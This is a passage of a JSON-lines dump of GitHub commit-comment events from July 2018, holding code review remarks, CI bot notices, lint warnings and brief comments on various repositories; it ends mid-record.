{"id":"8007586003","type":"CommitCommentEvent","actor":{"login":"SzNagyMisu"},"repo":{"name":"rspec/rspec-rails"},"payload":{"comment":{"id":29808422,"position":8,"line":248,"path":"lib/rspec/rails/matchers/active_job.rb","commit_id":"5da6e2a35e8bea9df3340bf4b6f23938a5b10740","created_at":"2018-07-24T03:20:46Z","updated_at":"2018-07-24T03:20:46Z","author_association":"NONE","body":"I don't really get this one... Where do you get `from` from? Did you mean: `_from`? And why sould `'rspec_rails'` include `\"_[\\\"world\\\", \\\"rspec\\\", \\\"rails\\\"]\"`?"}},"created_at":"2018-07-24T03:20:46Z"}
{"id":"8007591140","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808428,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T03:22:38Z","updated_at":"2018-07-24T03:22:38Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T03:22:38Z"}
{"id":"8007594396","type":"CommitCommentEvent","actor":{"login":"xiaoyiwu6"},"repo":{"name":"xiaoyiwu6/XTU"},"payload":{"comment":{"id":29808433,"position":9,"line":16,"path":"db/schema.rb","commit_id":"3840faea0c3582ac84125bfc3c0b650a5c0c0987","created_at":"2018-07-24T03:23:51Z","updated_at":"2018-07-24T03:23:51Z","author_association":"OWNER","body":"这里的修改有什么用的"}},"created_at":"2018-07-24T03:23:51Z"}
{"id":"8007609641","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808445,"position":33,"line":282,"path":"Tests/Unit/Module/Common.tests.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:29:38Z","updated_at":"2018-07-24T03:29:38Z","author_association":"OWNER","body":"Created new function `Test-StringIsLessThanOrEqualExcluding` to account for the excluding verbiage in `V-63661`. "}},"created_at":"2018-07-24T03:29:38Z"}
{"id":"8007615655","type":"CommitCommentEvent","actor":{"login":"xiaosunyang"},"repo":{"name":"xiaosunyang/demo"},"payload":{"comment":{"id":29808457,"position":null,"line":null,"path":null,"commit_id":"91ff2cec5582ae5b87bcf5d4e5f0055298390cc3","created_at":"2018-07-24T03:31:51Z","updated_at":"2018-07-24T03:31:51Z","author_association":"OWNER","body":"哈哈哈"}},"created_at":"2018-07-24T03:31:51Z"}
{"id":"8007615895","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808458,"position":60,"line":320,"path":"Tests/Unit/Module/Common.tests.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:31:57Z","updated_at":"2018-07-24T03:31:57Z","author_association":"OWNER","body":"Added string to account for `V-73641` where a hex value existed in a value that was also a range."}},"created_at":"2018-07-24T03:31:57Z"}
{"id":"8007617236","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808465,"position":61,"line":321,"path":"Tests/Unit/Module/Common.tests.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:32:27Z","updated_at":"2018-07-24T03:32:27Z","author_association":"OWNER","body":"Added string to account for the excluding verbiage."}},"created_at":"2018-07-24T03:32:27Z"}
{"id":"8007618748","type":"CommitCommentEvent","actor":{"login":"lin-zi-jun"},"repo":{"name":"lin-zi-jun/S200"},"payload":{"comment":{"id":29808468,"position":52,"line":92,"path":"SYSTEM/iap/iap.c","commit_id":"8426938d922dbd77ef5064a003cb5722ed29ef95","created_at":"2018-07-24T03:33:04Z","updated_at":"2018-07-24T03:33:04Z","author_association":"OWNER","body":"PFnet->FileName：版本号默认初始化为：V1.0，否则为更新成功后的版本号文件。\r\n"}},"created_at":"2018-07-24T03:33:04Z"}
{"id":"8007620776","type":"CommitCommentEvent","actor":{"login":"Stone-Zeng"},"repo":{"name":"latex3/latex3"},"payload":{"comment":{"id":29808471,"position":4,"line":13,"path":"l3kernel/CHANGELOG.md","commit_id":"2a996418e1604eda5dd7121c8ebbd35d7d31dbcc","created_at":"2018-07-24T03:33:51Z","updated_at":"2018-07-24T03:33:51Z","author_association":"CONTRIBUTOR","body":"There is a typo: should be `\\tl_(g)set_from_shell:Nnn`."}},"created_at":"2018-07-24T03:33:51Z"}
{"id":"8007622756","type":"CommitCommentEvent","actor":{"login":"Eduard0303"},"repo":{"name":"Eduard0303/mhe"},"payload":{"comment":{"id":29808474,"position":null,"line":null,"path":null,"commit_id":"8f63deefc8a2c1e54b3cb9725e9cf79104f54427","created_at":"2018-07-24T03:34:34Z","updated_at":"2018-07-24T03:34:34Z","author_association":"OWNER","body":"good\r\n"}},"created_at":"2018-07-24T03:34:34Z"}
{"id":"8007623890","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808475,"position":15,"line":46,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:35:00Z","updated_at":"2018-07-24T03:35:00Z","author_association":"OWNER","body":"Created new function Test-StringIsLessThanOrEqualExcluding to account for the excluding verbiage in V-63661 in the Windows 10 STIG."}},"created_at":"2018-07-24T03:35:00Z"}
{"id":"8007631540","type":"CommitCommentEvent","actor":{"login":"jacknum12"},"repo":{"name":"jacknum12/test"},"payload":{"comment":{"id":29808484,"position":null,"line":null,"path":null,"commit_id":"e177068a7a337f5dd87727c2cdd1034021f98e23","created_at":"2018-07-24T03:37:52Z","updated_at":"2018-07-24T03:37:52Z","author_association":"OWNER","body":"this is just a test!"}},"created_at":"2018-07-24T03:37:52Z"}
{"id":"8007632500","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808485,"position":27,"line":85,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:38:13Z","updated_at":"2018-07-24T03:38:13Z","author_association":"OWNER","body":"Modified the logic here to account for `V-63661` in the Windows 10 STIG and 'V-73641` in the Server 2016 STIG. Both of these rules evaluate to `$true` when testing for a range but would only output one number because they started with a hex value. This would cause the organization settings to not parse correctly."}},"created_at":"2018-07-24T03:38:13Z"}
{"id":"8007634250","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808488,"position":44,"line":187,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:38:53Z","updated_at":"2018-07-24T03:38:53Z","author_association":"OWNER","body":"This check accounts for the excluding verbiage in a range."}},"created_at":"2018-07-24T03:38:53Z"}
{"id":"8007635380","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29808489,"position":66,"line":227,"path":"src/webui/api/searchcontroller.cpp","commit_id":"e479a0e4077393f60dd2c37995021806f9b32ace","created_at":"2018-07-24T03:39:19Z","updated_at":"2018-07-24T03:39:19Z","author_association":"MEMBER","body":"now you must add `copyAsConst()`:\r\n`for (const QString &source : copyAsConst(params()[\"sources\"].split('|')))`\r\n\r\nAlso to similar instances below."}},"created_at":"2018-07-24T03:39:19Z"}
{"id":"8007637002","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808491,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T03:39:55Z","updated_at":"2018-07-24T03:39:55Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T03:39:55Z"}
{"id":"8007641002","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808502,"position":81,"line":665,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"cca99f055a1b5a47a267ed64e78959b89a68d032","created_at":"2018-07-24T03:41:24Z","updated_at":"2018-07-24T03:41:24Z","author_association":"OWNER","body":"Added an extra regex check for rule `V-73641` where the value started with a hex value and the number was wrapped in parenthesis. \r\n\r\nex. 0x0000001e (30) (or less, but not 0)"}},"created_at":"2018-07-24T03:41:24Z"}
{"id":"8007641383","type":"CommitCommentEvent","actor":{"login":"repository"},"repo":{"name":"seacosmos/blockchain"},"payload":{"comment":{"id":29808503,"position":null,"line":null,"path":null,"commit_id":"d66dd95f7a8408b3120cae114a75b10334311a25","created_at":"2018-07-24T03:41:32Z","updated_at":"2018-07-24T03:41:32Z","author_association":"NONE","body":"Hello."}},"created_at":"2018-07-24T03:41:32Z"}
{"id":"8007641602","type":"CommitCommentEvent","actor":{"login":"surepeps"},"repo":{"name":"kirilkirkov/Shopping-Cart-Solution-CodeIgniter"},"payload":{"comment":{"id":29808504,"position":null,"line":null,"path":null,"commit_id":"552cbc73fdd498db34bd96aa55ae03820d0b2255","created_at":"2018-07-24T03:41:38Z","updated_at":"2018-07-24T03:41:38Z","author_association":"NONE","body":"Pls the method of payment are not active, and there is no place to activate it ....,.."}},"created_at":"2018-07-24T03:41:38Z"}
{"id":"8007650827","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808517,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T03:45:12Z","updated_at":"2018-07-24T03:45:12Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T03:45:12Z"}
{"id":"8007656239","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29808524,"position":96,"line":258,"path":"src/webui/api/searchcontroller.cpp","commit_id":"e479a0e4077393f60dd2c37995021806f9b32ace","created_at":"2018-07-24T03:47:19Z","updated_at":"2018-07-24T03:47:19Z","author_association":"MEMBER","body":"This doesn't need to be in class, put it into anonymous namespace at top of this file\r\n```c++\r\nnamespace\r\n{\r\n    removeActiveSearch(ISession *session, const QString &id)\r\n    {\r\n    }\r\n}\r\n\r\nvoid SearchController::startAction()\r\n```"}},"created_at":"2018-07-24T03:47:19Z"}
{"id":"8007657957","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808527,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-24T03:47:58Z","updated_at":"2018-07-24T03:47:58Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1696 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-24T03:47:58Z"}
{"id":"8007661287","type":"CommitCommentEvent","actor":{"login":"Yuyu-Ren"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29808533,"position":null,"line":null,"path":null,"commit_id":"a92cbc05b185caeb95df347195e8bd0cee3b1feb","created_at":"2018-07-24T03:49:19Z","updated_at":"2018-07-24T03:49:19Z","author_association":"NONE","body":"Thanks for the tips on timedelta kwargs @idodin! Storing reminders in the DB to come soon! "}},"created_at":"2018-07-24T03:49:19Z"}
{"id":"8007662398","type":"CommitCommentEvent","actor":{"login":"asp2insp"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":29808534,"position":null,"line":null,"path":null,"commit_id":"80ae8c35d9d9a19dee1367e7ed90f54c5a4ecae9","created_at":"2018-07-24T03:49:46Z","updated_at":"2018-07-24T03:49:46Z","author_association":"CONTRIBUTOR","body":"@kageiit Sure! what would you prefer?"}},"created_at":"2018-07-24T03:49:46Z"}
{"id":"8007673619","type":"CommitCommentEvent","actor":{"login":"Luclys"},"repo":{"name":"Luclys/Projet-Rpg"},"payload":{"comment":{"id":29808546,"position":null,"line":null,"path":null,"commit_id":"e65255e1128b9612b82cc0e779f1e98ad7742c67","created_at":"2018-07-24T03:54:05Z","updated_at":"2018-07-24T03:54:05Z","author_association":"OWNER","body":"> Regardez plutôt le [Wiki](https://github.com/Luclys/Projet-Rpg/wiki), vous y retrouverez les infos.    "}},"created_at":"2018-07-24T03:54:05Z"}
{"id":"8007674220","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"tbaddade/redaxo_cheatsheet"},"payload":{"comment":{"id":29808547,"position":16,"line":41,"path":"boot.php","commit_id":"d1670e4c58eb3f224bba50230db93c9a5b4c154f","created_at":"2018-07-24T03:54:19Z","updated_at":"2018-07-24T03:54:19Z","author_association":"OWNER","body":"Danke … habs angepasst"}},"created_at":"2018-07-24T03:54:19Z"}
{"id":"8007676879","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29808552,"position":null,"line":null,"path":null,"commit_id":"9b88e46d70a4c29faec224248f431c388d031609","created_at":"2018-07-24T03:55:23Z","updated_at":"2018-07-24T03:55:23Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-24T03:55:23Z"}
{"id":"8007683928","type":"CommitCommentEvent","actor":{"login":"2013008264"},"repo":{"name":"2013008264/gitPractice"},"payload":{"comment":{"id":29808562,"position":6,"line":6,"path":"play.c","commit_id":"77fbc2cdf1f10ee50d0663b54159363e1809d17f","created_at":"2018-07-24T03:58:10Z","updated_at":"2018-07-24T03:58:10Z","author_association":"OWNER","body":"꺄르륵꺄르륵!"}},"created_at":"2018-07-24T03:58:10Z"}
{"id":"8007686905","type":"CommitCommentEvent","actor":{"login":"somallg"},"repo":{"name":"huyguain/daily-challenge-huy"},"payload":{"comment":{"id":29808566,"position":null,"line":null,"path":null,"commit_id":"d0400c85fcc54b053c8683aace2c02cde2aa5a6b","created_at":"2018-07-24T03:59:18Z","updated_at":"2018-07-24T03:59:18Z","author_association":"NONE","body":"từ đệ quy suy ra quy hoạt động được không ?"}},"created_at":"2018-07-24T03:59:18Z"}
{"id":"8007687081","type":"CommitCommentEvent","actor":{"login":"bholu202"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808568,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T03:59:22Z","updated_at":"2018-07-24T03:59:22Z","author_association":"NONE","body":"Interesting and innovative project"}},"created_at":"2018-07-24T03:59:22Z"}
{"id":"8007690455","type":"CommitCommentEvent","actor":{"login":"phidang0810"},"repo":{"name":"phidang0810/seller810"},"payload":{"comment":{"id":29808577,"position":71,"line":71,"path":"app/Repositories/CategoryRepository.php","commit_id":"70a5c78c70aa6036264c19219803688527088530","created_at":"2018-07-24T04:00:35Z","updated_at":"2018-07-24T04:00:35Z","author_association":"OWNER","body":"please remove this\r\n"}},"created_at":"2018-07-24T04:00:35Z"}
{"id":"8007691153","type":"CommitCommentEvent","actor":{"login":"phidang0810"},"repo":{"name":"phidang0810/seller810"},"payload":{"comment":{"id":29808579,"position":62,"line":62,"path":"app/Repositories/CategoryRepository.php","commit_id":"70a5c78c70aa6036264c19219803688527088530","created_at":"2018-07-24T04:00:50Z","updated_at":"2018-07-24T04:00:50Z","author_association":"OWNER","body":"remove!"}},"created_at":"2018-07-24T04:00:50Z"}
{"id":"8007692260","type":"CommitCommentEvent","actor":{"login":"Munnaq12"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808585,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T04:01:14Z","updated_at":"2018-07-24T04:01:14Z","author_association":"NONE","body":"Very nice project"}},"created_at":"2018-07-24T04:01:14Z"}
{"id":"8007697793","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"WebKit/webkit"},"payload":{"comment":{"id":29808596,"position":4,"line":1154,"path":"Source/JavaScriptCore/bytecode/CodeBlock.cpp","commit_id":"0e358f9e91dcc37e9e14ca1e7baeeaf12c5b66a7","created_at":"2018-07-24T04:03:28Z","updated_at":"2018-07-24T04:03:28Z","author_association":"NONE","body":"As mentioned in comments on https://github.com/Igalia/webkit/commit/3f94d2f1395f97cf914febbf21d7d81068bd6826#commitcomment-29808158...\r\n\r\nHowever, this doesn't seem to be enough. It has turned a consistent crash into something GC-related. Possibly related to thread synchronization?"}},"created_at":"2018-07-24T04:03:28Z"}
{"id":"8007698008","type":"CommitCommentEvent","actor":{"login":"Sergio0505"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808597,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T04:03:33Z","updated_at":"2018-07-24T04:03:33Z","author_association":"NONE","body":"Good project"}},"created_at":"2018-07-24T04:03:33Z"}
{"id":"8007698595","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaSell"},"payload":{"comment":{"id":29808598,"position":null,"line":null,"path":null,"commit_id":"6e3143e02736aea62129b40b59975a8111801f08","created_at":"2018-07-24T04:03:49Z","updated_at":"2018-07-24T04:03:49Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaSell/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `90eefa16-8ef6-11e8-8d09-e43b6e1395a9`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:03:49Z"}
{"id":"8007699288","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaSell"},"payload":{"comment":{"id":29808599,"position":null,"line":null,"path":null,"commit_id":"8dd4bcf1e6e975b9424fd789290c08c2d1472b42","created_at":"2018-07-24T04:04:05Z","updated_at":"2018-07-24T04:04:05Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaSell/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `9aa582be-8ef6-11e8-9fe8-66bf22516f24`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:04:05Z"}
{"id":"8007699381","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29808601,"position":null,"line":null,"path":null,"commit_id":"f08608d56327d872037e5a911643e5bc0286379c","created_at":"2018-07-24T04:04:08Z","updated_at":"2018-07-24T04:04:08Z","author_association":"COLLABORATOR","body":"@szymczdm, before the explicit \"read me\" message, can you please incorporate the discussion that we had today (July 23).  The distinction between problem and solution was quite nice.  The idea of having one source (model) and the (uni-directional) transformations into the other forms is also nice."}},"created_at":"2018-07-24T04:04:08Z"}
{"id":"8007699510","type":"CommitCommentEvent","actor":{"login":"marcopelegrini"},"repo":{"name":"kiegroup/droolsjbpm-knowledge"},"payload":{"comment":{"id":29808602,"position":null,"line":null,"path":null,"commit_id":"2a01202b23d6088257843771cbf8b88da6dbffde","created_at":"2018-07-24T04:04:11Z","updated_at":"2018-07-24T04:04:11Z","author_association":"NONE","body":"@mariofusco The statement in the Class' Javadoc about caching is not valid anymore after your changes. Also, what's the alternative to archive the same after your changes?\r\nI'm facing issues where the Classloader is read so many times that is impacting the performance of my application, as the system is very intensive in creating KieSessions."}},"created_at":"2018-07-24T04:04:11Z"}
{"id":"8007700922","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaSell"},"payload":{"comment":{"id":29808606,"position":null,"line":null,"path":null,"commit_id":"1268b422465922be4d86a847553708e195dbdf6a","created_at":"2018-07-24T04:04:43Z","updated_at":"2018-07-24T04:04:43Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaSell/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `b15d426c-8ef6-11e8-8ecb-a7d9db78e7fc`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:04:43Z"}
{"id":"8007701370","type":"CommitCommentEvent","actor":{"login":"cdzyp"},"repo":{"name":"cdzyp/token-profile"},"payload":{"comment":{"id":29808609,"position":null,"line":null,"path":null,"commit_id":"02ee7da1006b725d3e7dfad0968bf844a43f1abf","created_at":"2018-07-24T04:04:53Z","updated_at":"2018-07-24T04:04:53Z","author_association":"OWNER","body":"这是MYT的旧合约，上一个是MYT的新合约"}},"created_at":"2018-07-24T04:04:53Z"}
{"id":"8007702113","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaSell"},"payload":{"comment":{"id":29808610,"position":null,"line":null,"path":null,"commit_id":"7dcfbb5d0fd14cdabd69fdd6ede70ea2c6b2aa0d","created_at":"2018-07-24T04:05:10Z","updated_at":"2018-07-24T04:05:10Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaSell/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c17ab4c2-8ef6-11e8-9c23-6fb0e9dd6314`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:05:10Z"}
{"id":"8007704640","type":"CommitCommentEvent","actor":{"login":"daredoes"},"repo":{"name":"magfest/magwest2-site"},"payload":{"comment":{"id":29808612,"position":4,"line":4,"path":"site/content/bands/dokoe.md","commit_id":"11e32e03086c91e32a66636f21de05e0e34c8fa2","created_at":"2018-07-24T04:06:09Z","updated_at":"2018-07-24T04:06:09Z","author_association":"COLLABORATOR","body":"22/15/17 is not a valid date, this date causes a build error. Fixed and pushed 😄 "}},"created_at":"2018-07-24T04:06:09Z"}
{"id":"8007707667","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29808616,"position":null,"line":null,"path":null,"commit_id":"14c21b222d825b0a92b4885471be902e25bb5b62","created_at":"2018-07-24T04:07:21Z","updated_at":"2018-07-24T04:07:21Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      